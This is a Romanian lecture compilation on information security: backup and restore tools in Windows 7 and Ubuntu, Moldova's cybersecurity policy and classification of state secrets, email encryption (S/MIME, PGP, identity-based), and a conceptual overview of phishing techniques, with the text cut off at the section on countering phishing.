Putem alege una dintre următoarele variante:


- Dacă nu ați utilizat niciodată Copiere de rezervă Windows înainte, faceți clic pe Configurare
copiere de rezervă, apoi urmați pașii din expert.
- Dacă ați creat înainte o copie de rezervă, puteți aștepta să se producă copia de rezervă
programată regulat, sau puteți să creați manual o copie de rezervă nouă făcând clic pe Copiere
de rezervă acum.
Crearea unei noi copii de rezerva:
Alegem discul pe care se va salva copia de rezerva:

3
Apoi apare urmatoarea ferestra:

4
In acest caz alegem a doua optiune:

5
Aici putem alege fisierele dorite pentru Backup, de asemenea putem include si o imagine de sistem.

6
In cazul dat crearea copiilor se face la cerere, pentru programarea rularii acestui instrument putem
Accesa Modificare program, in acest caz crearea umatoarei copii se va face incremental, adica se va
adauga la imagine fisiere modificate sau noi.

Tastam OK, apoi Executam copiere de rezerva:

7
Pentru restaurarea fisierelor accesam Restaurare fisiere

Aici putem restaura unele foldere sau fisiere.

8
De asemenea le putem restabili in locatia initiala sau in alta locatie. Tastam Restaurare.

Creare imagine sistem

Pentru a crea o imagine de sistem accesam: Creare imagine sistem din Copie de rezerva si
restaurare:
9
Alegem discul pe care se va crea imaginea, apoi se va afisa informatia despre discurile carora li se
vor crea imagini

10
Creare disc de reparare sistem

Pentru a crea o imagine de sistem accesam: Creare disc de reparare a sistemului din Copie de
rezerva si restaurare:

Restaurare sistem
Pentru a folosi acest instrument accesam Panou de control\Toate elementele din Panoul de
control\Recuperare:
11
Accesam Deschidere Restaurare sistem si alegem puntul de restaurare:

12
Acest instrument e foarte util in cazul in care sa produs o eroare in sistem in urma instalarii unui
program, in acest caz nu avem nevoie de o restaurare integrala a sistemului, ci doar de revenirea la
starea initiala, facilitate care e oferita de acest instrument.

De asemenea putem crea un astfel de punct de restaurare.


Accesam Panou de control \Sistem\Protectie sistem\Creare

Tastam numele punctului de restaurare apoi tastam Creare.

SO Windows 7 mai dispune de un Instrument numit Windows Easy Transfer, care ne permite copierea
fisierelor personale pe un computer pe altul:

13
Acest transfer poate fi facut prin retea, printr-un cablu special sau printro unitate de stocare

3. Exemplu de utilizare a instrumentului implicit de Backup & Restore pentru


SO Ubuntu 10.10(Gnome):Deja Dup Backup Tool
14
Pentru configurare Backup-ului in SO Ubuntu accesam All Settings/ Backup:

Accesam Just show my backup settings:


Aici avem acces la urmatoarele meniuri:
Overview – Aici sunt informatiile totale despre locatia de Backup, Folderele la care sa va face Backup,
Folderele ce vor fi ignorate. De asemenea informatii despre ultimul Backup si urmatorul Backup
automat. Aici putem comuta On/Off optiunea de crearea automata a Backup-ului

Storage – Aici indicam locatia Backup-ului


 Pe cloud-ul contului de pe Ubuntu One – alegand aceasta optiune avem posibilitatea de a
accesa aceste fisiere de pe orice computer cu SO Linux. Pentru a alege aceasta optiune e
necesat crearea unui cont de utilizator pe cloud-ul Ubuntu One. La crearea contului ni se ofera
5GB gratuiti de stocare a informatiei, pe care ii putem folosi pentru stocare Backup-ului
15
 Pe servere de tip FTP, SSH, WebDAV, Windows Share
 Intr-un directoriu local

Folders – aici alegem folderele carora li se vor face Backup si foldrele ce vor fi ignorate la Backup

Schedule – alegem intervalul backup-urilor automate ( Zilnic sau saptamanal) si durate de pastrare a
Backup-ului (nedeterminata, un an, 6 luni)

16
Alegem pastrarea pe un folder local si apasam Backup now. Deja Dupa de asemena are optiune de
criptare a informatiilor pentru o mai buna securizare. Alegerea prolei de criptare e propusa la inceputul
Backup-ului:

Tastam Continue:

17
4. Compararea Deja Dup cu Windows Backup & Restore
Un avantaj important al instrumentrului Deja Dup este posibiliatea salvarii fisierului de Backup pe
server sau cont cloud si criptarea fisierului de backup, caracteristica care nu este prezenta in mod
automat Windows Backup & Restore, insa e posibil simplu de copiat manual imaginea creata pe
cloud-ul dorit . In privinta celorlalte instumente Windows are o gama mai larga de posibilitati, care nu
sunt prezente in Deja Dup, ca : Creare unui disc de reparare sistem, crearea imaginii sistemului,
crearea punctelor de restaurare a sistemuli. Un avantaj semnificativ al ambelor instrumente este faptul
ca sunt gratuite.

18
Aspectul organizaţional a
securităţii informaţionale
Program național de securitate
cibernetică a RM (2016-2020, HG nr811 din
29.11.15, MO nr.306-310 art.905)
Vine să implementeze prevederile:
• Acordului de Asociere RM-UE;
• Strategia securității cibernetice a UE;
• Convenția Consiliului Europei privind
criminalitatea informatică;
• Recomandările Uniunii Internaționale a
Telecomunicațiilor referitoare la asigurarea
securității cibernetice a rețelelor și
serviciilor de comunicații electronice.
Program național de securitate
cibernetică a RM (2016-2020, HG nr811 din
29.11.15, MO nr.306-310 art.905)
Programul include 7 domenii de intervenție:

1) procesarea sigură, stocarea și accesarea datelor;


2) securitatea şi integritatea reţelelor şi serviciilor de
comunicaţii electronice;
3) capacităţi de prevenire şi reacţie de urgenţă (CERT);
4) prevenirea şi combaterea criminalităţii informatice;
5) consolidarea capacităţilor de apărare cibernetică;
6) educaţia şi informarea;
7) cooperarea şi interacţiunea internaţională.
Program național de securitate
cibernetică a RM (2016-2020, HG nr811 din
29.11.15, MO nr.306-310 art.905)
Acțiunile din cadrul domeniilor de intervenție sunt orientate spre
implementarea a patru componente-cheie:

1) introducerea de cerințe minime obligatorii de securitate


cibernetică și standarde naționale de securitate cibernetică privind
procesarea, stocarea, transmiterea, păstrarea și accesarea sigură a
datelor;
2) certificarea și autorizarea specialiștilor și sistemelor informaționale,
conform standardelor aprobate;
3) efectuarea periodică a auditului de securitate cibernetică a
sistemelor informaționale și rețelelor de comunicații electronice în
cadrul autorităților publice și altor entități deținătoare de sisteme
informaționale de importanță vitală pentru societate;
4) introducerea de prescripții și sancțiuni pentru nerespectarea
cerințelor minime de securitate și a standardelor naționale în
domeniu.
Program național de securitate
cibernetică a RM (2016-2020, HG nr811 din
29.11.15, MO nr.306-310 art.905)

Realizarea și implementarea Programului se va


face prin respectarea obligatorie al principiului
neutralității tehnologice și principiile europene de
securitate cibernetică: protecţia drepturilor
fundamentale, libertăţii de exprimare, datelor
personale şi confidenţialităţii, accesul pentru toţi
la informații veridice și protejate, rezilienţa
cibernetică a sistemelor, responsabilitatea
comună și personalizată de executare a
activităților de asigurare a securităţii cibernetice.
Concepţia securităţii informaţionale
a Republicii Moldova
Adoptarea Concepţiei este determinată de:
• necesitatea protecţiei intereselor persoanelor,
societăţii, statului în spaţiul informaţional;
• de gravitatea şi multitudinea ameninţărilor la
adresa securităţii informaţionale în societatea
modernă;
• de necesitatea menţinerii unui echilibru între
interesele persoanelor, societăţii şi statului
pentru asigurarea securităţii informaţionale.
Concepţia securităţii informaţionale
a Republicii Moldova

Este sistem integrat de opinii referitoare


la scopurile, sarcinile, principiile şi
direcţiile de bază ale activităţii de
asigurare a nivelului necesar de
securitate informaţională şi de protecţie
a informaţiei în Republica Moldova.
Concepţia securităţii informaţionale
a Republicii Moldova
• securitate informaţională– stare de protecţie a
persoanei, societăţii şi a statului, care determină
capacitatea de rezistenţă la ameninţările împotriva
confidenţialităţii, integrităţii şi disponibilităţii în spaţiul
informaţional;

• securitate informaţională a Republicii Moldova –


stare de protecţie a persoanei, societăţii şi a statului,
a drepturilor şi intereselor acestora în spaţiul
informaţional, stipulate de Constituţie şi alte legi ale
Republicii Moldova, precum şi a drepturilor şi
intereselor ce ţin de căutarea, crearea, recepţionarea,
expedierea, distribuirea, prelucrarea, stocarea,
utilizarea şi protecţia informaţiei în spaţiul
informaţional;
Concepţia securităţii informaţionale
a Republicii Moldova
Documente de politici şi acte normative relevante:
1) Constituţia Republicii Moldova;
2) Decretul Preşedintelui Republicii Moldova nr.1743 din 19 martie 2004 privind
edificarea societăţii informaţionale în Republica Moldova;
3) Legea nr.112-XVI din 22 mai 2008 pentru aprobarea Concepţiei securităţii
naţionale a Republicii Moldova;
4) Legea nr. 619-XIII din 31 octombrie 1995 privind organele securităţii statului;
5) Legea nr. 1069-XIV din 22 iunie 2000 cu privire la informatică;
6) Legea nr. 467-XV din 21 noiembrie 2003 cu privire la informatizare şi la resursele
informaţionale de stat;
7) Legea comunicaţiilor electronice nr.241-XVI din 15 noiembrie 2007;
8) Legea nr. 245-XVI din 27 noiembrie 2008 cu privire la secretul de stat;
9) Legea nr. 20-XVI din 3 februarie 2009 privind prevenirea şi combaterea
criminalităţii informatice;
10) Legea nr.133 din 8 iulie 2011 privind protecţia datelor cu caracter
personal;
….
27) alte acte legislative şi normative în vigoare
Concepţia securităţii informaţionale
a Republicii Moldova
• Una dintre direcţiile principale ale politicii de stat în
domeniul asigurării SI este asigurarea juridică, în
cadrul căreia se elaborează şi se perfecţionează
legislaţia ce reglementează relaţiile în domeniul
informaţional.
Determinarea statutului juridic al tuturor subiecţilor din
spaţiul informaţional, inclusiv al deţinătorilor de
informaţie şi utilizatorilor de resurse, sisteme
informaţionale şi reţele de comunicaţii electronice, şi
responsabilităţii lor pentru nerespectarea legislaţiei
Republicii Moldova;
Crearea sistemului de colectare şi analiză a datelor
despre sursele de ameninţare la securitatea
informaţională şi consecinţele apariţiei acestora, ţinînd
cont de orice tipuri şi categorii de informaţii;
Concepţia securităţii informaţionale
a Republicii Moldova

Elaborarea legislaţiei care să stipuleze modul de


organizare a activităţilor de investigare şi examinare în
instanţele de judecată a faptelor ilegale în spaţiul
informaţional, precum şi modul de lichidare a
consecinţelor acestor acţiuni ilicite;
Elaborarea componentelor delictelor, ţinînd cont de
specificul răspunderii penale, civile, contravenţionale
şi disciplinare, includerea normelor de drept respective
în codurile penal, civil, contravenţional, al muncii şi în
alte acte legislative;
Perfecţionarea sistemului de pregătire a cadrelor.
Concepţia securităţii informaţionale
a Republicii Moldova
Securitatea informaţională, reprezentînd o
componentă inseparabilă de o importanţă
maximă a securităţii naţionale, este asigurată
de către Parlament, Preşedintele Republicii
Moldova, Guvern, Consiliul Suprem de
Securitate, Serviciul de Informaţii şi
Securitate, Ministerul Tehnologiei Informaţiei
şi Comunicaţiilor, Ministerul Afacerilor Interne,
Ministerul Apărării, Procuratură şi Ministerul
Educaţiei.
Concepţia securităţii informaţionale
a Republicii Moldova
Ministerul Afacerilor Interne, în limitele
competenţei sale:
1) realizează măsuri speciale de investigaţii,
înfăptuieşte acţiuni de urmărire penală şi de
expertiză judiciară în vederea prevenirii şi
combaterii infracţiunilor informatice;

2) efectuează măsuri de protecţie civilă şi


securitate antiincendiară a resurselor,
sistemelor informaţionale şi reţelelor de
comunicaţii electronice.
Sursele de ameninţări la
securitatea informaţională
Principalele surse externe ale ameninţărilor sînt:
1) criminalitatea informatică transnaţională, activitatea organizaţiilor
criminale internaţionale, a unor grupuri sau persoane, orientate
spre obţinerea accesului nesancţionat la resursele de reţea şi
informaţie;
2) activitatea organizaţiilor teroriste şi extremiste internaţionale,
interesul acestora faţă de posedarea şi utilizarea armei
informaţionale;
3) activitatea structurilor politice, economice, militare, de spionaj şi
a serviciilor speciale străine, orientată spre efectuarea controlului
global şi obţinerea neautorizată a informaţiei;
4) avansarea tehnologică a structurilor mondiale, înteţirea
concurenţei mondiale pentru deţinerea celor mai importante
tehnologii şi resurse;
5) elaborarea de către un şir de state a concepţiei de război
informaţional.
Sursele de ameninţări la
securitatea informaţională
Principalele surse interne ale ameninţărilor sînt:
1) imperfecţiunea cadrului normativ privind organizarea
şi funcţionarea sistemului complex unic de protecţie a
informaţiei în RM, inclusiv a subsistemelor de protecţie
tehnică şi criptografică a informaţiei;
2) activitatea ilegală a unor grupuri sau persoane,
orientată spre obţinerea neautorizată a accesului la
resursele informaţionale, la tehnologii sau efectuarea
controlului asupra funcţionării resurselor, tehnologiei
informaţiei, sistemelor informaţionale şi reţelelor de
comunicaţii electronice;
3) imperfecţiunea legislaţiei referitoare la prevenirea şi
combaterea criminalităţii informatice;
Sursele de ameninţări la
securitatea informaţională
Principalele surse interne ale ameninţărilor sînt:
4) coordonarea insuficientă a activităţii, delimitarea neclară a
atribuţiilor autorităţilor administraţiei publice ce ţin de elaborarea
şi realizarea politicii de stat în vederea asigurării securităţii
informaţionale a Republicii Moldova;
5) utilizarea silită a mijloacelor tehnice şi de program importate
pentru crearea resurselor, tehnologiei informaţiei, sistemelor
informaţionale şi reţelelor de comunicaţii electronice, cauzată de
dezvoltarea întîrziată a industriei autohtone;
6) nivelul redus de informatizare a autorităţilor administraţiei
publice, a domeniului financiar de creditare, a industriei,
agriculturii, educaţiei, sănătăţii, de deservire a cetăţenilor, precum
şi de instruire a populaţiei pentru lucrul cu sistemul informaţional;
7) alocarea insuficientă din bugetul de stat a mijloacelor financiare
pentru activităţile ce ţin de securitatea informaţională în Republica
Moldova.
Cerințele minime obligatorii de
securitate cibernetică
• Vor fi implementate în cadrul instituțiilor administrației publice centrale din Republica Moldova și
vor contribui la sporirea gradului de securitate şi încredere în spaţiul digital.

• Conform domeniului de aplicare, cerințele minime obligatorii de securitate cibernetică vor fi


divizate în două categorii:

- cerințele de nivelul 1, care se referă la utilizarea tehnologiilor informaționale în activitatea


instituțiilor

- cerințele de nivelul 2, de securitate cibernetică avansată, destinate instituțiilor care prestează


servicii bazate pe tehnologiile informaționale și comunicații.

• Proiectul conține standarde de securitate pentru ambele niveluri, inclusiv privind securitatea fizică
și cea operațională, schimbul de date.

• Totodată, documentul delimitează responsabilitățile autorităților publice în domeniul


reglementării procedurilor interne ce vor asigura gradul necesar de securitate cibernetică.

• Astfel, instituțiile publice vor fi responsabile pentru efectuarea auditului intern de securitate
cibernetică, instruirea personalului, elaborarea ghidului de utilizare a poștei electronice și alte
activități ce vor contribui la procesarea și accesarea în siguranță a datelor.
Cerințele minime obligatorii de
securitate cibernetică

Cerințele minime de securitate


cibernetică include toate politicile,
procedurile, planurile, procesele,
practicile, rolurile, responsabilitățile,
resursele și structurile care sunt
folosite pentru a proteja și păstra
intactă informația.
Cerințele de nivelul 1
• Controlul accesului
• Securitatea fizică
• Securitatea operațională
Cerințele de nivelul 2
• Controlul accesului
• Securitatea fizică
• Securitatea operațională
Tema nr.3 Protecția informațiilor
prin clasificarea lor

1. Clasificarea informațiilor
2. Copii de rezervă (backup-uri)
3. Sisteme de jurnalizare

Lector univ. R.Bulai


1. Clasificarea informațiilor
• NATO are meritul principal în dezvoltarea
sistemului de clasificare a informațiilor.
• Clasificarea este operația de etichetare
crescătoare a documentelor sau informațiilor, de
la cel mai de jos nivel, unde se situează
informațiile publice sau neclasificate, la cele
confidențiale, urcînd spre informații secrete și
strict secrete (structura ierarhizată ).
• Informațiile confidențiale, secrete și strict
secrete sunt denumite informații clasificate
(sensibile).
1. Clasificarea informațiilor
• Există o strînsă legătură între responsabilitățile
angajaților și categoriile de informații cu care
se dă dreptul de a lucra.
• Un angajat poate citi documentele dintr-o
anumită categorie, numai dacă el are cel puțin
împuternicirea de accesare a informațiilor din
categoria respectivă sau dintr-una superioară.
1. Clasificarea informațiilor
• Organizațiile își protejează informațiile care le oferă
avantaje în fața concurenților – secrete comerciale;
• Guvernele își protejează informațiile de apărare
națională și de relații internaționale - secrete de stat;
• În ambele ipostaze, informația protejată este atât de
importantă, încât ajungerea ei în posesia adversarilor
(dușman/concurent) poate să aibă efecte negative
asupra intereselor majore (securitatea
națională/profitul).
• Informațiile declasificate sau făcute publice pe cale
oficială nu mai pot fi reclasificate.
Informații subiective
• Guvernele pornesc de la o altă clasificare:
informații subiective (operaționale) și obiective
(științifice, tehnice).
• Inf.subiective au următoarele caracteristici:
dimensiune redusă, perceptibilitate universală
(nu este necesară o pregătire specială pentru al
înțelege), conținutul poate fi schimbat, au o viață
scurtă.
• Adversarul nu are cum să producă o astfel de
informație, dar o poate obține prin spionaj sau
dezvăluire neautorizată.
Informații obiective
Inf. științifice sau secrete științifice – care deși sunt
descoperite și controlate de un guvern, pot fi deja
cunoscute sau pot fi descoperite independent de o altă
țară. Caracteristici:
• Sunt confuze, nu se pot transmite cu ușurință;
• Pot fi înțelese numai de oameni de știință;
• Nu sunt supuse schimbării, au caracter etern, valoare unică;
• Pot avea o viață lungă ca secret.

Inf.tehnice - proiecte, metode, un proces, o tehnică, nu


sunt fenomene naturale și sunt utilizate in exploatarea
inf.științifice.
Etapele clasificării informațiilor

• 1. Stabilirea nevoii de clasificare;


• 2. Determinarea nivelurilor clasificării;
• 3. Determinarea duratei clasificării.
1. Stabilirea nevoii de clasificare;
• Definirea cu exactitate a informațiilor de
clasificat;
• Stabilirea dacă informațiile se încadrează într-
unul dintre domeniile supuse clasificării;
• Verificarea dacă informațiile se află sub control
guvernamental;
• Concluzionarea dacă dezvăluirea inf. poate să
conducă la cauzarea daunelor pentru securitatea
națională;
• Specificarea precisă a nevoii de clasificare a
informațiilor
2. Determinarea nivelurilor clasificării
Un sistem de clasificare eficient trebuie să se
bazeze pe niveluri de clasificare definite cu
mare claritate. De ex.
• SUA – strict secret, secret și confidențiale;
• România – strict secrete de o importanță
deosebită, informațiile strict secrete și
inf.secrete;
• R.Moldova???
LEGE Nr. 245
din 27.11.2008cu privire la secretul de stat

• Sînt stabilite 4 grade de secretizare a informaţiilor atribuite la secret de stat şi 4 parafe de


secretizare corespunzătoare pentru purtătorii materiali de asemenea informaţii:
a) „Strict secret” – grad de secretizare atribuit informaţiilor a căror divulgare neautorizată
poate aduce prejudicii deosebit de grave intereselor şi/sau securităţii Republicii Moldova;
b) „Secret” – grad de secretizare atribuit informaţiilor a căror divulgare neautorizată
poate dăuna grav intereselor şi/sau securităţii Republicii Moldova;
c) „Confidenţial” – grad de secretizare atribuit informaţiilor a căror divulgare neautorizată
poate dăuna intereselor şi/sau securităţii Republicii Moldova;
d) „Restricţionat” – grad de secretizare atribuit informaţiilor a căror divulgare
neautorizată poate fi în dezavantajul intereselor şi/sau securităţii Republicii Moldova sau
poate să conducă la divulgarea unei informaţii secretizate cu parafa „Strict secret”, „Secret”
sau „Confidenţial”.

• Pentru informaţiile avînd gradul de secretizare „Strict secret” se stabileşte un termen de


secretizare de pînă la 25 de ani, pentru informaţiile cu gradul „Secret” – un termen de pînă
la 15 ani, pentru informaţiile cu gradul „Confidenţial” – de pînă la 10 ani şi pentru
informaţiile cu gradul „Restricţionat” – de pînă la 5 ani.
(2) Pentru informaţiile despre persoanele care colaborează sau au colaborat confidenţial
cu organe ce desfăşoară activităţi de informaţii, de contrainformaţii şi operative de
investigaţii se stabileşte un termen de secretizare nelimitat.
3. Determinarea duratei clasificării
Se determină prin una dintre urm. metode:
• Ca o perioadă de timp măsurată de la data
emiterii documentului;
• În funcție de un eveniment viitor ce poate să
apară înaintea operațiunii de declasificare;
• Documentul va fi marcat, pentru a se indica
instituția aflată la originea lui, ce va avea
sarcina declasificării.
Clasificarea informațiilor organizațiilor
• Inform. care necesită un control special (speciale) sunt
notate cu S și includ inf. și materialele care ar aduce
pierderi de 10% din profitul brut anual – echivalente cu inf.
strict secrete la nivel național;
• Inf. confidențiale la nivel de unitate notate cu C și includ inf.
și materialele care ar aduce pierderi de 1% din profitul brut
anual – echivalente cu inf. secrete la nivel național;
• Informațiile private notate cu P care ar prejudicia statutul
unei persoane din organizație – confidențiale;
• Inf. de uz intern sunt notate cu R și reprezintă inf. cu
restricții în utilizare;
• Inf. publice notate cu N sau pentru public – inf. neclasificate;
• Inf. numai pentru domnul/doamna…Numai pentru
compartimentul…
Criterii de clasificare a informațiilor
• Valoarea dacă o inf. este valoroasă pentru org. sau
concurenți, ea trebuie clasificată – cr. principal;
• Vârsta care conduce la stabilirea unei valori
diferențiate. Cu cît vechimea e mai mare, cu atît inf.
pierd din valoare, interesul pentru ele se pierde;
• Uzura morală cînd inf. sunt înlocuite cu altele noi
sau în organizație s-au produs schimbări radicale,
vechea clasificare este înlocuită cu alta;
• Asocierea cu persoanele influențează în funcție de
importanța indivizilor care reglementează regimul
datelor personale.
Procedurile de clasificare a
informațiilor
• Identificarea proprietarului/custodelui
(administratorul sau directorul org. care
răspunde de averile informaționale
încredințate / cel ce prestează un serviciu
delegîndu-i-se responsabilități pe linia
protejării inf., de obicei specialiști în TI);
• Specificarea criteriilor după care vor fi
clasificate și etichetate informațiile (de
ob.proprietarul);
Procedurile de clasificare a
informațiilor
• Clasificarea datelor după proprietar, care devine
subiect supus auditării efectuate de un superior;
• Precizarea și documentarea oricăror excepții de la
politicile de securitate;
• Precizarea controalelor aplicate fiecărui nivel de
clasificare;
• Specificarea procedurilor de declasificare sau
transferarea custodiei unei altei entități;
• Crearea unui program de conștientizare la nivel
de org. dspre controalele pe linia clasificării
inform.
Protecția inf.speciale în sistemele de
prelucrare automată
• Modul dedicat – toate inf. prelucrate de sistem fac parte din
aceeași categorie, iar persoanele sistemului posedă
autorizație de acces la categoria respectivă;
• Modul sistem superior – inf. pot să aparțină unor categorii
diferite, iar persoanele sistemului posedă autorizări de
acces la nivelul cel mai înalt;
• Modul controlat – inf. din categorii diferite și persoanele au
autorizații diferite, dar sistemul se va baza pe restricții fizice
prin care să se respecte toate principiile SI;
• Modul securității stratificate - inf. din categorii diferite și
persoanele au autorizații diferite, dar conceptul
credibilității componentelor informatice (hardware,
software și firmware – soft din ROM) rezolvă problema.
2. Copii de siguranță (backup-uri)
• Copiile de siguranţă (backup) sunt necesare
pentru a permite recuperarea datelor şi
aplicaţiilor în cazul unor evenimente cum ar fi:
dezastre naturale, defecţiuni ale discurilor de
sistem, spionaj, erori de introducere a datelor,
erori de funcţionare a sistemului etc.
• Crearea unei copii de rezervă poate fi realizată cu
unul din programele: Cobian Backup, Acronis True
Image, Norton Ghost, Paragon Backup&Recovery,
FBackup etc.
2. Copii de siguranță (backup-uri)
• Studii de specialitate facute de diverse
organizatii privind cauzele primare ale
pierderii datelor indica ca surse primare
defectarea echipamentelor si eroarea umana.
Defectarea echipamentelor
Primul motiv care cauzează pierderea datelor, prin:
• defectarea fizica a discurilor,
• scurt circuite,
• probleme cu sursa de alimentare a calculatorului,
• defecte cauzate de uzura echipamentelor.

• Spre exemplu rata de inlocuire in garantie raportate de


marii producatori de hard discuri este de 0.6-0.9% dar
studii paralele indica cifre precum 2-4%.
• Garantia însă inseamna schimbarea sau repararea discului
fara costuri suplimentare, insa nici un producator nu isi va
asuma recuperare datelor.
Eroarea umana
Este a doua cea mai des intalnita cauza, dar
careia i se da cea mai mica importanta sau este
cel mai des trecuta cu vederea. Ex.:
• stergeri accidentale a fisierelor,
• formatari accidentale,
• erori facute de administratorii sistemelor (totusi
eroarea vrem sau nu vrem este umana),
• utilizare incorecta, cauzate de scapari,
• pierderea dispozitivelor de stocare mobile.
Securitate email

Problematica uzuala:
• Ce se incearca protejat
• Impotriva cui
Ce se urmareste:
• Confidentialitate – pe email se trimit informatii private
• Autenticitate – cine trimite email in realitate
• Anti-spam
• Phishing
Strategii generale:
• Criptarea continutului mesajului cu o cheie simetrica, utilizand o
cheie de trafic generata aleator
• Utilizarea criptografiei cu chei publice pentru criptarea pentru toti
beneficiarii
• Semnatura digitala a mesajului
1
Probleme securitate email

• Nu toate sistemele de mail accepta toate caracterele intr-un set de


caractere dat

• Transformarile criptografice nu implica doar schimbari minore;

• Codificare: EBCEDIC – ASCII? Unicode? Tab – blank?

• Solutie: codificare intreg email in base64 utilizand caracterele


acceptate de toate sistemele A-Z, a-z, 0-9, +, /;

• Base64 converteste 3 caractere necodate, ex ASCII in 4 caractere


codate ASCII. Ca rezultat se obtine un overhead de 33%. Se
remarca codificarea diferita functie de pozitia in grupul celor 3 octeri
ce sunt codificati pentru a produce 4 caractere;

• Numai aceste caractere au importanta, orice altceva este sters la


receptie inclusiv spatiile albe.

2
Signing

Semnatura:
• Daca se semneaza plaintext si apoi se cripteaza, identitatea
transmitatorului este ascunsa tuturor exceptand adevaratii receptori
• Daca se semneaza textul criptat, un gateway poate verifica
semnatura – una dintre cele mai bune merode anti-spam si anti-
phishing.

Headere:
• Headerele sunt schimbate in tranzit
• Valorile campurilor in header sunt in formar ASCII si nu poate fi
codat base64
• Exemplu evident: Received: se adauga cate o linie
• Mai putin evident: adresele de mail sunt de multe ori rescrise pentru
ascunderea masinilor interne si prezentarea de adrese clare in
exterior
• In consecinta headerele nu pot fi protejate prin scheme de
securizare email.

3
Criptare email – S/MIME

S/MIME (Secure / Multipurpose Internet Mail Extensions) este un


standard pentru criptarea cu cheie publica si semnarea mesajelor de
mail incapsulate MIME.

• S/MIME furnizeaza urmatoarele servicii criptografice pentru


aplicatiile de mesagerie electronica:
– Autentificare
– Integritatea mesajului si nerepudierea originii (utilizand semnaturi
digitale)
– Caracterul privat si securitatea datelor (utilizand criptare)

• O practica buna este de a utiliza chei private si certificatele asociate


separate pentru semnatura si pentru criptare. Asa se permite
pastrarea in siguranta a cheii de criptare fara a compromite
proprietatea de nerepudiere a cheii de semnatura.

4
Probleme - S/MIME

• Nu tot software-ul email manipuleaza S/MIME. Pentru


compatibilizare se atasaza un fisier (devine confuz).
• S/MIME nu este propriu pentru clientii webmail. Probleme in
browser, practica de securitate cere ca cheia privata sa fie
accesibila utilizatorului, dar inaccesibila serverului de webmail.
Metoda de securizare cu semnatura webmail cere ca browserul sa
execute cod pentru a produce semnatura (bresa de securitate).
• S/MIME sunt dimensionate pentru securitate end to end. Nu se va
cripta numai mesajul ci si malware. Daca mesajul este scanat
oriunde in afara de punctul final, malware va fi distribuit cu succes.
• Solutii:
– Realizarea scanarii malware la statia terminala dupa decriptare;
– Pastrarea cheii private pe gateway server a.i. decriptarea sa se poata
face inainte de scanare la gateway (are dezavantajul ca oricine cu
acces la gateway server poate citi mailuri ale altor utilizatori).
– Utilizarea scanerelor de continut capabile sa certifice continutul
mesajelor criptate

5
Criptare email - Pretty Good Privacy

• Pretty Good Privacy (PGP) este un program care realizeaza criptare


si autentificare. El este adesea utilizat pentru semnarea, criptarea si
descriptarea email pentru a creste securitatea.
• Criptarea PGP utilizeaza criptarea cu cheie publica si include un
sistem care leaga cheia publica de nume utilizator si/sau adresa
email.
• In implementarile recente a fost adaugat X.509 care utilizeaza o
abordare ierarhica bazata pe autoritate de certificare.
• PGP suporta autentificarea mesajelor si verificarea integritatii pentru
determinarea alterarii mesajului si a autentificarii transmitatorului
prin semnatura digitala.
• Semnatura digitala este creata fie cu algoritm RSA fie DSA. PGP
calculeaza o cheie hash de la plaintext si creaza o semnatura
digitala utilizand cheia privata a transmitatorului.
• PGP include un mod de revocare a certificatelor si suporta data
expirare certificat.
• Calitatea securizarii. PGP este considerat unul dintre mecanismele
sigure. Pe masura ce au fost descoperite vulnerabilitati acestea au
fost remediate.
6
Criptare email - ID based

• ID-based cryptography (sau Identity-Based Encryption (IBE) sau


identity-based cryptography) este un tip de criptografie cu cheie
publica in care cheia publica a unui utilizator este o informatie unica
despre identitatea sa (de ex. adresa email, numele sau numele
domeniului sau adresa IP).
• Prima implementare bazata pe adresa de mail PKI introdusa de Adi
Shamir si permite utilizatorilor sa verifice semnatura digitala utilizand
numai o informatie publica (identificator utilizator).
• Identity-based systems permit oricarei parti sa genereze o cheie
publica pornind de la o valoare a identitatii cunoscute ca un sir
ASCII. O a treia parte, de incredere, numita si Private Key
Generator (PKG), genereaza cheile private corespondente. Pentru
operare PKG creaza master public key si pastreaza master private
key corespunzatoare. Cu master public key orice parte poate calcula
o cheie publica corespunzand identitatii (ID) prin combinarea master
public key cu valoarea ID. Pentru a obtine o cheie privata
corespondenta partea autorizata sa utilizeze identitatea ID
contacteaza PKG care utilizeaza master private key pentru
generarea cheii private pentru identitatea data ID.
• Ca rezultat partile pot cripta mesaje sau verifica identitati fara o
distributie prealabila a cheilor intre diversi participanti individuali. 7
Criptare email - ID based

Avantaje:
• Numar finit de utilizatori, dupa ce toti utilizatorii au primit chei
secretul de terta parte poate fi distrus
• IBE elimina necesitatea infrastructurii de distributie a cheilor publice
• Facilitati interesante prin posibilitatea de codificare a informatiilor
aditionale (data de expirare mesaj, timestamp). Datele incapsulate
in ID sunt similare cu deschiderea unui nou canal intre transmitator
si PKG cu autenticitate garantata.

Dezavantaje:
• Deoarece PKG genereaza chei private pentru utilizatori el poate
decripta si/sau semna orice mesaj fara autorizare
• Datorita abordarii centralizate pentru PKG, criptografia IB nu este
utilizabila in super-retele
• Necesita un canal sigur intre utilizator si PKG pentru transmiterea
cheii private la intrarea in sistem. O solutie fezabila este o conexiune
SSL.

8
Phishing

Definitie: Este un proces fraudulos prin care se incearca obtinerea de


informatii sensibile cum sunt: nume utilizatori, parole si informatii
detaliate pentru carti de credit prin deghizarea ca o entitate de
incredere intr-o comunicatie electronica.

• Falsifica transmitatorul e-mail ca fiind de la o institutie financiara sau


de la web site-uri cunoscute.
• Redirecteaza utilizatorii pentru introducerea de detalii pe un site
pirat care arata aproape identic cu cel original
• De regula cere intreruperea legaturii active, daca aceasta exista, si
revalidarea contului
• Chiar cand se utilizeaza autentificarea, utilizatorul trebuie sa fie
experimentat pentru a detecta ca site-ul este fals
• Adesea pretinde ca a fost suspendat contul si cere reintroducerea
datelor
• Este un exemplu de tehnica de manipulare pentru a pacali utilizatorii
si a exploata cunostintele precare in securitate web

9
Phishing

Tehnici pe care se bazeaza:


• Social Engineering (Manipulare sociologica) – bazata pe reactia
oamenilor la lucruri ce au importanta pentru ei. Subiectele
genereaza panica si cer actiune imediata "to restore access to your
bank account"
• Link manipulation – utilizarea unor forme prin care se creaza un link
in email la un site web falsificat.
• Filter evasion – Atacatorii utilizeaza imagini in loc de text pentru a
face dificila detectarea atacului de filtrele anti-phishing.
• Website forgery – utilizare de JavaScript pentru alterare continut
bara de adrese, utilizare de cross-site scripting, man-in-the-middle.
Se poate utiliza si Flash.
• Phone phishing – atac ce nu necesita in site fals. Mesajul care
aparent vine de la banca cere utilizatorilor sa sune la un numar
pentru problemele relative la cont. Se invita utilizatorul sa introduca
contul si pinul. Voice phishing (Vishing) poate utiliza un caller ID fals
pentru a crea aparenta apelului de la o organizatie de incredere.

10
Combatere phishing

• Social responses – pregatirea populatiei pentru a recunoaste


